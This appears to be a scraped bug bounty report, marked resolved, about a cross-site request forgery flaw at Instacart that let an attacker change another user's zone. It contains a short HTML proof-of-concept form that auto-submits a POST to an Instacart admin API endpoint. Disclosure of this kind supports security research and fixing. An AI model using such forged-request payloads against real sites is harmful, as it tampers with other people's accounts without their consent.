Loading HuntDB...

Cross-Site Request Forgery (CSRF)

I
Instacart
Submitted None
Reported by malcolmx

Vulnerability Details

Technical details and impact analysis

Cross-Site Request Forgery (CSRF)
Hello, i found Cross-Site Request Forgery (CSRF) that can change any user ZONE POC: ``` <html> <body> <form action="https://admin.instacart.com/api/v2/zones" method="POST"> <input type="hidden" name="zip" value="10001" /> <input type="hidden" name="override" value="true" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` put Zone you want send the request to any user and you will change his Zone __Please Watch My POC I Attached For More Details__ Thanks

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-Site Request Forgery (CSRF)